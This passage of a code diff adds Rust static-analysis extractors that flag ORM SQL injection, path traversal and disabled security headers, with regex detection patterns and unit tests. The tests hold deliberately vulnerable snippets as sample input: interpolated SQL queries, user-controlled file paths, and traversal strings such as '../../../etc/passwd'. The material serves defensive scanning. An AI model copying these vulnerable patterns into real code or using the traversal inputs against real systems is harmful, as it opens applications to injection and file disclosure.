pub use path_traversal::PathTraversalExtractor;
pub use rate_limit::{RateLimitExtractor, RateLimitThresholds};
pub use registry::ExtractorRegistry;
pub use security_headers::SecurityHeadersExtractor;
pub use sql_injection::SqlInjectionExtractor;
pub use ssrf::SsrfExtractor;
pub use timeout_config::{TimeoutConfigExtractor, TimeoutThresholds};
pub use tls_verify::TlsVerifyExtractor;
pub use tls_version::TlsVersionExtractor;
@@ -66,4 +87,7 @@ pub use traits::{build_claim, is_test_file, Extractor};
pub use unreal_config::UnrealConfigExtractor;
pub use unreal_cpp::UnrealCppExtractor;
pub use unreal_performance::UnrealPerformanceExtractor;
pub use unvalidated_redirects::UnvalidatedRedirectsExtractor;
pub use weak_crypto::WeakCryptoExtractor;
pub use weak_password::WeakPasswordExtractor;
pub use xxe::XxeExtractor;

370
applications/aphoria/src/extractors/orm_injection.rs
Normal file
@@ -0,0 +1,370 @@
//! ORM SQL injection vulnerability extractor.
//!
//! Detects patterns where ORM methods are used with string interpolation
//! instead of proper parameterized queries, which can lead to SQL injection.

use regex::Regex;
use stemedb_core::types::ObjectValue;

use super::traits::{build_claim, Extractor};
use crate::types::{ExtractedClaim, Language};

/// Extractor for ORM-specific SQL injection vulnerabilities.
///
/// Detects patterns indicating unsafe query construction in popular ORMs:
/// - Django: .raw() and .extra() with string interpolation
/// - SQLAlchemy: text() and execute() with f-strings
/// - Sequelize: query() with template literals
/// - TypeORM: where() with template literals
/// - GORM: Raw() with fmt.Sprintf
/// - Prisma: $queryRawUnsafe with interpolation
pub struct OrmInjectionExtractor {
    // Django patterns
    django_raw: Regex,
    django_extra: Regex,

    // SQLAlchemy patterns
    sqlalchemy_text: Regex,
    sqlalchemy_exec: Regex,

    // Sequelize patterns
    sequelize_raw: Regex,

    // TypeORM patterns
    typeorm_where: Regex,

    // GORM patterns
    gorm_raw: Regex,

    // Prisma patterns
    prisma_raw: Regex,
}

impl Default for OrmInjectionExtractor {
    fn default() -> Self {
        Self::new()
    }
}

impl OrmInjectionExtractor {
    /// Create a new ORM injection extractor with compiled regexes.
    ///
    /// # Panics
    /// Panics if any regex pattern is invalid (programmer error).
    #[allow(clippy::expect_used)]
    pub fn new() -> Self {
        Self {
            // Django: raw/extra with formatting
            django_raw: Regex::new(r#"\.raw\s*\(\s*(?:f["']|["'][^"']*\{[^}]*\}["']\.format)"#)
                .expect("valid regex"),
            django_extra: Regex::new(r#"\.extra\s*\([^)]*where\s*=\s*\[.*(?:f["']|%)"#)
                .expect("valid regex"),

            // SQLAlchemy: text with formatting
            sqlalchemy_text: Regex::new(r#"text\s*\(\s*(?:f["']|["'][^"']*%|["'][^"']*\.format)"#)
                .expect("valid regex"),
            sqlalchemy_exec: Regex::new(r#"\.execute\s*\(\s*(?:f["']|["'][^"']*\{)"#)
                .expect("valid regex"),

            // Sequelize: raw query interpolation
            sequelize_raw: Regex::new(r#"sequelize\.query\s*\(\s*`[^`]*\$\{"#)
                .expect("valid regex"),

            // TypeORM: where with interpolation
            typeorm_where: Regex::new(r#"\.(?:where|andWhere|orWhere)\s*\(\s*`[^`]*\$\{"#)
                .expect("valid regex"),

            // GORM: Raw with Sprintf
            gorm_raw: Regex::new(r#"\.Raw\s*\(\s*(?:fmt\.Sprintf|"[^"]*"\s*\+)"#)
                .expect("valid regex"),

            // Prisma: $queryRawUnsafe
            prisma_raw: Regex::new(r#"\$queryRawUnsafe\s*\(\s*`[^`]*\$\{"#).expect("valid regex"),
        }
    }

    fn make_claim(
        path_segments: &[String],
        file: &str,
        line: usize,
        matched: &str,
        orm: &str,
        description: &str,
    ) -> ExtractedClaim {
        build_claim(
            path_segments,
            &["db", "orm", "query"],
            "query_construction",
            ObjectValue::Text(format!("interpolated_{}", orm)),
            file,
            line,
            matched,
            0.9,
            description,
        )
    }
}

impl Extractor for OrmInjectionExtractor {
    fn name(&self) -> &str {
        "orm_injection"
    }

    fn languages(&self) -> &[Language] {
        &[Language::Python, Language::JavaScript, Language::TypeScript, Language::Go]
    }

    fn extract(
        &self,
        path_segments: &[String],
        content: &str,
        language: Language,
        file: &str,
    ) -> Vec<ExtractedClaim> {
        let mut claims = Vec::new();

        for (line_idx, line) in content.lines().enumerate() {
            let line_num = line_idx + 1;

            match language {
                Language::Python => {
                    // Django raw queries
                    if let Some(m) = self.django_raw.find(line) {
                        claims.push(Self::make_claim(
                            path_segments,
                            file,
                            line_num,
                            m.as_str(),
                            "django",
                            "Django .raw() with string interpolation (SQL injection risk)",
                        ));
                    }
                    // Django extra queries
                    if let Some(m) = self.django_extra.find(line) {
                        claims.push(Self::make_claim(
                            path_segments,
                            file,
                            line_num,
                            m.as_str(),
                            "django",
                            "Django .extra() with interpolation (SQL injection risk)",
                        ));
                    }
                    // SQLAlchemy text
                    if let Some(m) = self.sqlalchemy_text.find(line) {
                        claims.push(Self::make_claim(
                            path_segments,
                            file,
                            line_num,
                            m.as_str(),
                            "sqlalchemy",
                            "SQLAlchemy text() with interpolation (SQL injection risk)",
                        ));
                    }
                    // SQLAlchemy execute
                    if let Some(m) = self.sqlalchemy_exec.find(line) {
                        claims.push(Self::make_claim(
                            path_segments,
                            file,
                            line_num,
                            m.as_str(),
                            "sqlalchemy",
                            "SQLAlchemy execute() with f-string (SQL injection risk)",
                        ));
                    }
                }
                Language::JavaScript | Language::TypeScript => {
                    // Sequelize raw query
                    if let Some(m) = self.sequelize_raw.find(line) {
                        claims.push(Self::make_claim(
                            path_segments,
                            file,
                            line_num,
                            m.as_str(),
                            "sequelize",
                            "Sequelize raw query with template literal (SQL injection risk)",
                        ));
                    }
                    // TypeORM where
                    if let Some(m) = self.typeorm_where.find(line) {
                        claims.push(Self::make_claim(
                            path_segments,
                            file,
                            line_num,
                            m.as_str(),
                            "typeorm",
                            "TypeORM where() with template literal (SQL injection risk)",
                        ));
                    }
                    // Prisma queryRawUnsafe
                    if let Some(m) = self.prisma_raw.find(line) {
                        claims.push(Self::make_claim(
                            path_segments,
                            file,
                            line_num,
                            m.as_str(),
                            "prisma",
                            "Prisma $queryRawUnsafe with interpolation (SQL injection risk)",
                        ));
                    }
                }
                Language::Go => {
                    // GORM Raw
                    if let Some(m) = self.gorm_raw.find(line) {
                        claims.push(Self::make_claim(
                            path_segments,
                            file,
                            line_num,
                            m.as_str(),
                            "gorm",
                            "GORM Raw() with fmt.Sprintf (SQL injection risk)",
                        ));
                    }
                }
                _ => {}
            }
        }

        claims
    }
}

#[cfg(test)]
mod tests {
    use super::*;

    #[test]
    fn test_django_raw_fstring() {
        let extractor = OrmInjectionExtractor::new();
        let content = r#"
users = User.objects.raw(f"SELECT * FROM users WHERE name = '{name}'")
"#;

        let claims =
            extractor.extract(&["python".to_string()], content, Language::Python, "views.py");

        assert_eq!(claims.len(), 1);
        assert!(claims[0].concept_path.contains("db/orm/query"));
    }

    #[test]
    fn test_django_raw_format() {
        let extractor = OrmInjectionExtractor::new();
        let content = r#"
users = User.objects.raw("SELECT * FROM users WHERE id = {}".format(user_id))
"#;

        let claims =
            extractor.extract(&["python".to_string()], content, Language::Python, "views.py");

        // This matches the django_raw pattern (has {} and .format)
        assert_eq!(claims.len(), 1);
    }

    #[test]
    fn test_sqlalchemy_text() {
        let extractor = OrmInjectionExtractor::new();
        let content = r#"
result = session.execute(text(f"SELECT * FROM users WHERE id = {user_id}"))
"#;

        let claims = extractor.extract(&["python".to_string()], content, Language::Python, "db.py");

        assert_eq!(claims.len(), 1);
        assert!(claims[0].description.contains("SQLAlchemy"));
    }

    #[test]
    fn test_sqlalchemy_execute_fstring() {
        let extractor = OrmInjectionExtractor::new();
        let content = r#"
conn.execute(f"UPDATE users SET name = '{name}' WHERE id = {id}")
"#;

        let claims = extractor.extract(&["python".to_string()], content, Language::Python, "db.py");

        assert_eq!(claims.len(), 1);
    }

    #[test]
    fn test_sequelize_raw() {
        let extractor = OrmInjectionExtractor::new();
        let content = r#"
const users = await sequelize.query(`SELECT * FROM users WHERE id = ${userId}`);
"#;

        let claims = extractor.extract(&["js".to_string()], content, Language::JavaScript, "db.js");

        assert_eq!(claims.len(), 1);
        assert!(claims[0].description.contains("Sequelize"));
    }

    #[test]
    fn test_typeorm_where() {
        let extractor = OrmInjectionExtractor::new();
        let content = r#"
const user = await userRepo.createQueryBuilder("user")
    .where(`user.id = ${userId}`)
    .getOne();
"#;

        let claims =
            extractor.extract(&["ts".to_string()], content, Language::TypeScript, "user.ts");

        assert_eq!(claims.len(), 1);
    }

    #[test]
    fn test_gorm_raw() {
        let extractor = OrmInjectionExtractor::new();
        let content = r#"
db.Raw(fmt.Sprintf("SELECT * FROM users WHERE id = %d", userID)).Scan(&user)
"#;

        let claims = extractor.extract(&["go".to_string()], content, Language::Go, "repo.go");

        assert_eq!(claims.len(), 1);
        assert!(claims[0].description.contains("GORM"));
    }

    #[test]
    fn test_prisma_query_raw_unsafe() {
        let extractor = OrmInjectionExtractor::new();
        let content = r#"
const users = await prisma.$queryRawUnsafe(`SELECT * FROM users WHERE id = ${userId}`);
"#;

        let claims = extractor.extract(&["ts".to_string()], content, Language::TypeScript, "db.ts");

        assert_eq!(claims.len(), 1);
        assert!(claims[0].description.contains("Prisma"));
    }

    #[test]
    fn test_no_false_positives_parameterized() {
        let extractor = OrmInjectionExtractor::new();
        // Safe: parameterized query - no f-string, no .format(), just %s placeholder
        let content = r#"
users = User.objects.raw("SELECT * FROM users WHERE id = %s", [user_id])
"#;

        let claims =
            extractor.extract(&["python".to_string()], content, Language::Python, "views.py");

        assert!(claims.is_empty());
    }

    #[test]
    fn test_no_false_positives_orm_filter() {
        let extractor = OrmInjectionExtractor::new();
        // Safe: using ORM filter methods
        let content = r#"
users = User.objects.filter(id=user_id)
"#;

        let claims =
            extractor.extract(&["python".to_string()], content, Language::Python, "views.py");

        assert!(claims.is_empty());
    }
}
348
applications/aphoria/src/extractors/path_traversal.rs
Normal file
@ -0,0 +1,348 @@
|
||||
//! Path traversal vulnerability extractor.
|
||||
//!
|
||||
//! Detects patterns where file system operations use user-controlled input
|
||||
//! without proper validation, which can lead to directory traversal attacks.
|
||||
|
||||
use regex::Regex;
|
||||
use stemedb_core::types::ObjectValue;
|
||||
|
||||
use super::traits::{build_claim, Extractor};
|
||||
use crate::types::{ExtractedClaim, Language};
|
||||
|
||||
/// Extractor for path traversal vulnerabilities.
|
||||
///
|
||||
/// Detects patterns indicating unsafe file path handling:
|
||||
/// - File operations with user-controlled input
|
||||
/// - Path.join/filepath.Join with request parameters
|
||||
/// - sendFile/res.download with user input
|
||||
/// - Direct traversal literals (../ or %2e%2e)
|
||||
pub struct PathTraversalExtractor {
|
||||
// Python patterns
|
||||
python_open_user: Regex,
|
||||
python_path_join: Regex,
|
||||
|
||||
// JavaScript/TypeScript patterns
|
||||
js_fs_user: Regex,
|
||||
js_path_join: Regex,
|
||||
js_sendfile: Regex,
|
||||
|
||||
// Go patterns
|
||||
go_filepath: Regex,
|
||||
|
||||
// Rust patterns
|
||||
rust_path_user: Regex,
|
||||
|
||||
// Universal patterns
|
||||
traversal_literal: Regex,
|
||||
}
|
||||
|
||||
impl Default for PathTraversalExtractor {
|
||||
fn default() -> Self {
|
||||
Self::new()
|
||||
}
|
||||
}
|
||||
|
||||
impl PathTraversalExtractor {
|
||||
/// Create a new path traversal extractor with compiled regexes.
|
||||
///
|
||||
/// # Panics
|
||||
/// Panics if any regex pattern is invalid (programmer error).
|
||||
#[allow(clippy::expect_used)]
|
||||
pub fn new() -> Self {
|
||||
Self {
|
||||
// Python: file ops with user input
|
||||
python_open_user: Regex::new(
|
||||
r#"(?:open|read|write)\s*\([^)]*(?:request\.|params\[|input|user)"#,
|
||||
)
|
||||
.expect("valid regex"),
|
||||
python_path_join: Regex::new(
|
||||
r#"os\.path\.join\s*\([^)]*(?:request\.|params\[|input|user)"#,
|
||||
)
|
||||
.expect("valid regex"),
|
||||
|
||||
// JavaScript: fs/path with user input
|
||||
js_fs_user: Regex::new(
|
||||
r#"fs\.(?:readFile|writeFile|createReadStream|readFileSync|writeFileSync)\s*\([^)]*(?:req\.|params\.|query\.)"#,
|
||||
)
|
||||
.expect("valid regex"),
|
||||
js_path_join: Regex::new(
|
||||
r#"path\.(?:join|resolve)\s*\([^)]*(?:req\.|params\.|query\.)"#,
|
||||
)
|
||||
.expect("valid regex"),
|
||||
js_sendfile: Regex::new(r#"res\.(?:sendFile|download)\s*\([^)]*(?:req\.|params\.)"#)
|
||||
.expect("valid regex"),
|
||||
|
||||
// Go: filepath with user input
|
||||
go_filepath: Regex::new(
|
||||
r#"(?:filepath\.Join|os\.Open|os\.ReadFile|ioutil\.ReadFile)\s*\([^)]*(?:r\.|req\.|c\.)"#,
|
||||
)
|
||||
.expect("valid regex"),
|
||||
|
||||
// Rust: path operations with user input
|
||||
rust_path_user: Regex::new(
|
||||
r#"(?:Path::new|PathBuf::from|std::fs::read|std::fs::write)\s*\([^)]*(?:request|params|query|user)"#,
|
||||
)
|
||||
.expect("valid regex"),
|
||||
|
||||
// Universal: direct traversal literals
|
||||
traversal_literal: Regex::new(r#"\.\.[\\/]|(?i:%2e%2e)"#).expect("valid regex"),
|
||||
}
|
||||
}
|
||||
|
||||
fn make_claim(
|
||||
path_segments: &[String],
|
||||
file: &str,
|
||||
line: usize,
|
||||
matched: &str,
|
||||
category: &str,
|
||||
description: &str,
|
||||
) -> ExtractedClaim {
|
||||
build_claim(
|
||||
path_segments,
|
||||
&["filesystem", "path", category],
|
||||
"user_controlled_path",
|
||||
ObjectValue::Boolean(true),
|
||||
file,
|
||||
line,
|
||||
matched,
|
||||
0.85,
|
||||
description,
|
||||
)
|
||||
}
|
||||
}
|
||||
|
||||
impl Extractor for PathTraversalExtractor {
|
||||
fn name(&self) -> &str {
|
||||
"path_traversal"
|
||||
}
|
||||
|
||||
fn languages(&self) -> &[Language] {
|
||||
&[
|
||||
Language::Python,
|
||||
Language::JavaScript,
|
||||
Language::TypeScript,
|
||||
Language::Go,
|
||||
Language::Rust,
|
||||
]
|
||||
}
|
||||
|
||||
fn extract(
|
||||
&self,
|
||||
path_segments: &[String],
|
||||
content: &str,
|
||||
language: Language,
|
||||
file: &str,
|
||||
) -> Vec<ExtractedClaim> {
|
||||
let mut claims = Vec::new();
|
||||
|
||||
for (line_idx, line) in content.lines().enumerate() {
|
||||
let line_num = line_idx + 1;
|
||||
|
||||
// Check for traversal literals in any language
|
||||
if let Some(m) = self.traversal_literal.find(line) {
|
||||
claims.push(Self::make_claim(
|
||||
path_segments,
|
||||
file,
|
||||
line_num,
|
||||
m.as_str(),
|
||||
"traversal",
|
||||
"Path contains directory traversal sequence (../ or URL-encoded %2e%2e)",
|
||||
));
|
||||
}
|
||||
|
||||
// Language-specific patterns
|
||||
match language {
|
||||
Language::Python => {
|
||||
if let Some(m) = self.python_open_user.find(line) {
|
||||
claims.push(Self::make_claim(
|
||||
path_segments,
|
||||
file,
|
||||
line_num,
|
||||
m.as_str(),
|
||||
"file_operation",
|
||||
"File operation with user-controlled path (path traversal risk)",
|
||||
));
|
||||
}
|
||||
if let Some(m) = self.python_path_join.find(line) {
|
||||
claims.push(Self::make_claim(
|
||||
path_segments,
|
||||
file,
|
||||
line_num,
|
||||
m.as_str(),
|
||||
"path_construction",
|
||||
"os.path.join with user input (path traversal risk)",
|
||||
));
|
||||
}
|
||||
}
|
||||
Language::JavaScript | Language::TypeScript => {
|
||||
if let Some(m) = self.js_fs_user.find(line) {
|
||||
claims.push(Self::make_claim(
|
||||
path_segments,
|
||||
file,
|
||||
line_num,
|
||||
m.as_str(),
|
||||
"file_operation",
|
||||
"fs operation with user-controlled path (path traversal risk)",
|
||||
));
|
||||
}
|
||||
if let Some(m) = self.js_path_join.find(line) {
|
||||
claims.push(Self::make_claim(
|
||||
path_segments,
|
||||
file,
|
||||
line_num,
|
||||
m.as_str(),
|
||||
"path_construction",
|
||||
"path.join/resolve with user input (path traversal risk)",
|
||||
));
|
||||
}
|
||||
if let Some(m) = self.js_sendfile.find(line) {
|
||||
claims.push(Self::make_claim(
|
||||
path_segments,
|
||||
file,
|
||||
line_num,
|
||||
m.as_str(),
|
||||
"file_serving",
|
||||
"res.sendFile/res.download with user input (path traversal risk)",
|
||||
));
|
||||
}
|
||||
}
|
||||
Language::Go => {
|
||||
if let Some(m) = self.go_filepath.find(line) {
|
||||
claims.push(Self::make_claim(
|
||||
path_segments,
|
||||
file,
|
||||
line_num,
|
||||
m.as_str(),
|
||||
"file_operation",
|
||||
"Filepath operation with user input (path traversal risk)",
|
||||
));
|
||||
}
|
||||
}
|
||||
Language::Rust => {
|
||||
if let Some(m) = self.rust_path_user.find(line) {
|
||||
claims.push(Self::make_claim(
|
||||
path_segments,
|
||||
file,
|
||||
line_num,
|
||||
m.as_str(),
|
||||
"file_operation",
|
||||
"Path operation with user input (path traversal risk)",
|
||||
));
|
||||
}
|
||||
}
|
||||
_ => {}
|
||||
}
|
||||
}
|
||||
|
||||
claims
|
||||
}
|
||||
}
|
||||
|
||||
#[cfg(test)]
|
||||
mod tests {
|
||||
use super::*;
|
||||
|
||||
#[test]
|
||||
fn test_python_open_user_input() {
|
||||
let extractor = PathTraversalExtractor::new();
|
||||
let content = r#"
|
||||
file = open(request.GET['filename'], 'r')
|
||||
"#;
|
||||
|
||||
let claims =
|
||||
extractor.extract(&["python".to_string()], content, Language::Python, "app.py");
|
||||
|
||||
assert_eq!(claims.len(), 1);
|
||||
assert!(claims[0].concept_path.contains("filesystem/path"));
|
||||
}
|
||||
|
||||
#[test]
|
||||
fn test_python_path_join() {
|
||||
let extractor = PathTraversalExtractor::new();
|
||||
let content = r#"
|
||||
path = os.path.join(base_dir, request.args['file'])
|
||||
"#;
|
||||
|
||||
let claims =
|
||||
extractor.extract(&["python".to_string()], content, Language::Python, "app.py");
|
||||
|
||||
assert_eq!(claims.len(), 1);
|
||||
}
|
||||
|
||||
#[test]
|
||||
fn test_js_fs_read() {
|
||||
let extractor = PathTraversalExtractor::new();
|
||||
let content = r#"
|
||||
fs.readFileSync(req.query.file);
|
||||
"#;
|
||||
|
||||
let claims =
|
||||
extractor.extract(&["js".to_string()], content, Language::JavaScript, "app.js");
|
||||
|
||||
assert_eq!(claims.len(), 1);
|
||||
}
|
||||
|
||||
#[test]
|
||||
fn test_js_sendfile() {
|
||||
let extractor = PathTraversalExtractor::new();
|
||||
let content = r#"
|
||||
res.sendFile(req.params.filename);
|
||||
"#;
|
||||
|
||||
let claims =
|
||||
extractor.extract(&["js".to_string()], content, Language::JavaScript, "app.js");
|
||||
|
||||
assert_eq!(claims.len(), 1);
|
||||
}
|
||||
|
||||
#[test]
|
||||
fn test_go_filepath() {
|
||||
let extractor = PathTraversalExtractor::new();
|
||||
let content = r#"
|
||||
path := filepath.Join(baseDir, r.URL.Query().Get("file"))
|
||||
"#;
|
||||
|
||||
let claims = extractor.extract(&["go".to_string()], content, Language::Go, "main.go");
|
||||
|
||||
assert_eq!(claims.len(), 1);
|
||||
}
|
||||
|
||||
#[test]
|
||||
fn test_traversal_literal() {
|
||||
let extractor = PathTraversalExtractor::new();
|
||||
let content = r#"
|
||||
path := "../../../etc/passwd"
|
||||
"#;
|
||||
|
||||
let claims = extractor.extract(&["go".to_string()], content, Language::Go, "main.go");
|
||||
|
||||
assert_eq!(claims.len(), 1);
|
||||
assert!(claims[0].description.contains("traversal sequence"));
|
||||
}
|
||||
|
||||
#[test]
|
||||
fn test_encoded_traversal() {
|
||||
let extractor = PathTraversalExtractor::new();
|
||||
let content = r#"
|
||||
url := "%2e%2e%2fconfig"
|
||||
"#;
|
||||
|
||||
let claims = extractor.extract(&["go".to_string()], content, Language::Go, "main.go");
|
||||
|
||||
assert_eq!(claims.len(), 1);
|
||||
}
|
||||
|
||||
#[test]
|
||||
fn test_no_false_positives_safe_path() {
|
||||
let extractor = PathTraversalExtractor::new();
|
||||
// Safe: no user input
|
||||
let content = r#"
|
||||
fs.readFileSync('./config.json');
|
||||
"#;
|
||||
|
||||
let claims =
|
||||
extractor.extract(&["js".to_string()], content, Language::JavaScript, "app.js");
|
||||
|
||||
assert!(claims.is_empty());
|
||||
}
|
||||
}
|
||||
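The universal traversal-literal check above can be sketched without the `regex` crate. This is a minimal illustration, not code from this commit: `traversal_lines` is a hypothetical helper name, and it assumes that a case-insensitive substring match is an acceptable stand-in for the `traversal_literal` pattern.

```rust
/// Hypothetical helper (not part of this commit): returns the 1-based line
/// numbers that contain a directory traversal literal.
///
/// Mirrors the extractor's line-by-line scan, but uses plain substring
/// checks instead of a compiled regex.
fn traversal_lines(content: &str) -> Vec<usize> {
    content
        .lines()
        .enumerate()
        .filter(|(_, line)| {
            // Lowercase once so mixed-case encodings such as %2E%2e are caught.
            let lower = line.to_ascii_lowercase();
            lower.contains("../") || lower.contains("..\\") || lower.contains("%2e%2e")
        })
        // Line numbers reported to users are 1-based, as in `extract`.
        .map(|(idx, _)| idx + 1)
        .collect()
}
```

A relative path such as `./config.json` is not flagged, because it contains `./` but never `../`.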
@ -13,9 +13,14 @@ use super::dep_versions::DepVersionsExtractor;
|
||||
use super::hardcoded_secrets::HardcodedSecretsExtractor;
|
||||
use super::high_entropy::HighEntropySecretsExtractor;
|
||||
use super::insecure_cookies::InsecureCookiesExtractor;
|
||||
use super::insecure_deserialization::InsecureDeserializationExtractor;
|
||||
use super::jwt_config::JwtConfigExtractor;
|
||||
use super::orm_injection::OrmInjectionExtractor;
|
||||
use super::path_traversal::PathTraversalExtractor;
|
||||
use super::rate_limit::RateLimitExtractor;
|
||||
use super::security_headers::SecurityHeadersExtractor;
|
||||
use super::sql_injection::SqlInjectionExtractor;
|
||||
use super::ssrf::SsrfExtractor;
|
||||
use super::timeout_config::{TimeoutConfigExtractor, TimeoutThresholds};
|
||||
use super::tls_verify::TlsVerifyExtractor;
|
||||
use super::tls_version::TlsVersionExtractor;
|
||||
@ -23,7 +28,10 @@ use super::traits::Extractor;
|
||||
use super::unreal_config::UnrealConfigExtractor;
|
||||
use super::unreal_cpp::UnrealCppExtractor;
|
||||
use super::unreal_performance::UnrealPerformanceExtractor;
|
||||
use super::unvalidated_redirects::UnvalidatedRedirectsExtractor;
|
||||
use super::weak_crypto::WeakCryptoExtractor;
|
||||
use super::weak_password::WeakPasswordExtractor;
|
||||
use super::xxe::XxeExtractor;
|
||||
|
||||
/// Registry of available extractors.
|
||||
pub struct ExtractorRegistry {
|
||||
@ -116,6 +124,31 @@ impl ExtractorRegistry {
|
||||
if is_enabled("insecure_cookies") {
|
||||
extractors.push(Box::new(InsecureCookiesExtractor::new()));
|
||||
}
|
||||
// Phase 8: Enterprise security extractors
|
||||
if is_enabled("path_traversal") {
|
||||
extractors.push(Box::new(PathTraversalExtractor::new()));
|
||||
}
|
||||
if is_enabled("unvalidated_redirects") {
|
||||
extractors.push(Box::new(UnvalidatedRedirectsExtractor::new()));
|
||||
}
|
||||
if is_enabled("weak_password") {
|
||||
extractors.push(Box::new(WeakPasswordExtractor::new()));
|
||||
}
|
||||
if is_enabled("security_headers") {
|
||||
extractors.push(Box::new(SecurityHeadersExtractor::new()));
|
||||
}
|
||||
if is_enabled("insecure_deserialization") {
|
||||
extractors.push(Box::new(InsecureDeserializationExtractor::new()));
|
||||
}
|
||||
if is_enabled("ssrf") {
|
||||
extractors.push(Box::new(SsrfExtractor::new()));
|
||||
}
|
||||
if is_enabled("orm_injection") {
|
||||
extractors.push(Box::new(OrmInjectionExtractor::new()));
|
||||
}
|
||||
if is_enabled("xxe") {
|
||||
extractors.push(Box::new(XxeExtractor::new()));
|
||||
}
|
||||
|
||||
// Register declarative extractors from config
|
||||
// Declarative extractors are always enabled unless explicitly disabled.
|
||||
@ -199,7 +232,7 @@ mod tests {
|
||||
use crate::extractors::declarative::{DeclarativeClaimDef, DeclarativeValue};
|
||||
|
||||
/// Number of built-in extractors (not counting declarative).
|
||||
const BUILTIN_EXTRACTOR_COUNT: usize = 17;
|
||||
const BUILTIN_EXTRACTOR_COUNT: usize = 25;
|
||||
|
||||
#[test]
|
||||
fn test_registry_creation() {
|
||||
|
||||
359
applications/aphoria/src/extractors/security_headers.rs
Normal file
@ -0,0 +1,359 @@
|
||||
//! Disabled or insecure security headers extractor.
|
||||
//!
|
||||
//! Detects patterns where security headers are explicitly disabled or
|
||||
//! configured insecurely.
|
||||
|
||||
use regex::Regex;
|
||||
use stemedb_core::types::ObjectValue;
|
||||
|
||||
use super::traits::{build_claim, Extractor};
|
||||
use crate::types::{ExtractedClaim, Language};
|
||||
|
||||
/// Extractor for disabled or insecurely configured security headers.
|
||||
///
|
||||
/// Detects patterns indicating insecure header configurations:
|
||||
/// - X-Frame-Options disabled or set to ALLOWALL
|
||||
/// - X-Content-Type-Options disabled
|
||||
/// - X-XSS-Protection disabled
|
||||
/// - HSTS disabled
|
||||
/// - Content-Security-Policy disabled or using unsafe-inline/unsafe-eval
|
||||
pub struct SecurityHeadersExtractor {
|
||||
// Explicit header disabled
|
||||
header_disabled: Regex,
|
||||
|
||||
// Django secure settings explicitly disabled (False or 0)
|
||||
django_missing: Regex,
|
||||
|
||||
// YAML headers disabled
|
||||
yaml_disabled: Regex,
|
||||
|
||||
// Frame options ALLOWALL
|
||||
frame_allowall: Regex,
|
||||
|
||||
// CSP disabled or unsafe
|
||||
csp_unsafe: Regex,
|
||||
|
||||
// HSTS disabled
|
||||
hsts_disabled: Regex,
|
||||
}
|
||||
|
||||
impl Default for SecurityHeadersExtractor {
|
||||
fn default() -> Self {
|
||||
Self::new()
|
||||
}
|
||||
}
|
||||
|
||||
impl SecurityHeadersExtractor {
|
||||
/// Create a new security headers extractor with compiled regexes.
|
||||
///
|
||||
/// # Panics
|
||||
/// Panics if any regex pattern is invalid (programmer error).
|
||||
#[allow(clippy::expect_used)]
|
||||
pub fn new() -> Self {
|
||||
Self {
|
||||
// Explicit header disabled in various formats
|
||||
header_disabled: Regex::new(
|
||||
r#"(?i)(?:X-Frame-Options|X-Content-Type-Options|X-XSS-Protection)\s*[:=]\s*["']?(?:none|disabled?|false|off)["']?"#,
|
||||
)
|
||||
.expect("valid regex"),
|
||||
|
||||
// Django secure settings explicitly disabled (False or 0)
|
||||
django_missing: Regex::new(
|
||||
r#"(?i)SECURE_(?:BROWSER_XSS_FILTER|CONTENT_TYPE_NOSNIFF|HSTS_SECONDS|SSL_REDIRECT)\s*=\s*(?:False|0)"#,
|
||||
)
|
||||
.expect("valid regex"),
|
||||
|
||||
// YAML headers disabled
|
||||
yaml_disabled: Regex::new(
|
||||
r#"(?i)(?:x_frame_options|xss_protection|content_type_nosniff|hsts)\s*:\s*(?:false|no|disabled?|off)"#,
|
||||
)
|
||||
.expect("valid regex"),
|
||||
|
||||
// Frame options ALLOWALL (dangerous)
|
||||
frame_allowall: Regex::new(r#"(?i)X-Frame-Options\s*[:=]\s*["']?ALLOWALL"#)
|
||||
.expect("valid regex"),
|
||||
|
||||
// CSP disabled or using unsafe-inline/unsafe-eval
|
||||
csp_unsafe: Regex::new(
|
||||
r#"(?i)(?:Content-Security-Policy|CSP)\s*[:=]\s*["']?(?:none|disabled?|.*unsafe-(?:inline|eval))"#,
|
||||
)
|
||||
.expect("valid regex"),
|
||||
|
||||
// HSTS disabled or set to 0
|
||||
hsts_disabled: Regex::new(
|
||||
r#"(?i)(?:Strict-Transport-Security|HSTS|hsts_seconds)\s*[:=]\s*(?:["']?(?:none|disabled?|false|off)["']?|0)"#,
|
||||
)
|
||||
.expect("valid regex"),
|
||||
}
|
||||
}
|
||||
|
||||
fn make_claim(
|
||||
path_segments: &[String],
|
||||
file: &str,
|
||||
line: usize,
|
||||
matched: &str,
|
||||
header: &str,
|
||||
description: &str,
|
||||
) -> ExtractedClaim {
|
||||
build_claim(
|
||||
path_segments,
|
||||
&["http", "security_headers", header],
|
||||
"header_status",
|
||||
ObjectValue::Text("disabled".to_string()),
|
||||
file,
|
||||
line,
|
||||
matched,
|
||||
0.8,
|
||||
description,
|
||||
)
|
||||
}
|
||||
}
|
||||
|
||||
impl Extractor for SecurityHeadersExtractor {
|
||||
fn name(&self) -> &str {
|
||||
"security_headers"
|
||||
}
|
||||
|
||||
fn languages(&self) -> &[Language] {
|
||||
&[
|
||||
Language::Python,
|
||||
Language::JavaScript,
|
||||
Language::TypeScript,
|
||||
Language::Go,
|
||||
Language::Yaml,
|
||||
Language::Json,
|
||||
Language::Toml,
|
||||
]
|
||||
}
|
||||
|
||||
fn extract(
|
||||
&self,
|
||||
path_segments: &[String],
|
||||
content: &str,
|
||||
_language: Language,
|
||||
file: &str,
|
||||
) -> Vec<ExtractedClaim> {
|
||||
let mut claims = Vec::new();
|
||||
|
||||
for (line_idx, line) in content.lines().enumerate() {
|
||||
let line_num = line_idx + 1;
|
||||
|
||||
// Check for explicitly disabled headers
|
||||
if let Some(m) = self.header_disabled.find(line) {
|
||||
let header = if line.to_lowercase().contains("frame") {
|
||||
"x_frame_options"
|
||||
} else if line.to_lowercase().contains("content-type") {
|
||||
"x_content_type_options"
|
||||
} else {
|
||||
"x_xss_protection"
|
||||
};
|
||||
claims.push(Self::make_claim(
|
||||
path_segments,
|
||||
file,
|
||||
line_num,
|
||||
m.as_str(),
|
||||
header,
|
||||
"Security header explicitly disabled",
|
||||
));
|
||||
}
|
||||
|
||||
// Check Django secure settings
|
||||
if let Some(m) = self.django_missing.find(line) {
|
||||
let header = if line.to_lowercase().contains("xss") {
|
||||
"x_xss_protection"
|
||||
} else if line.to_lowercase().contains("nosniff") {
|
||||
"x_content_type_options"
|
||||
} else if line.to_lowercase().contains("hsts") {
|
||||
"hsts"
|
||||
} else {
|
||||
"ssl_redirect"
|
||||
};
|
||||
claims.push(Self::make_claim(
|
||||
path_segments,
|
||||
file,
|
||||
line_num,
|
||||
m.as_str(),
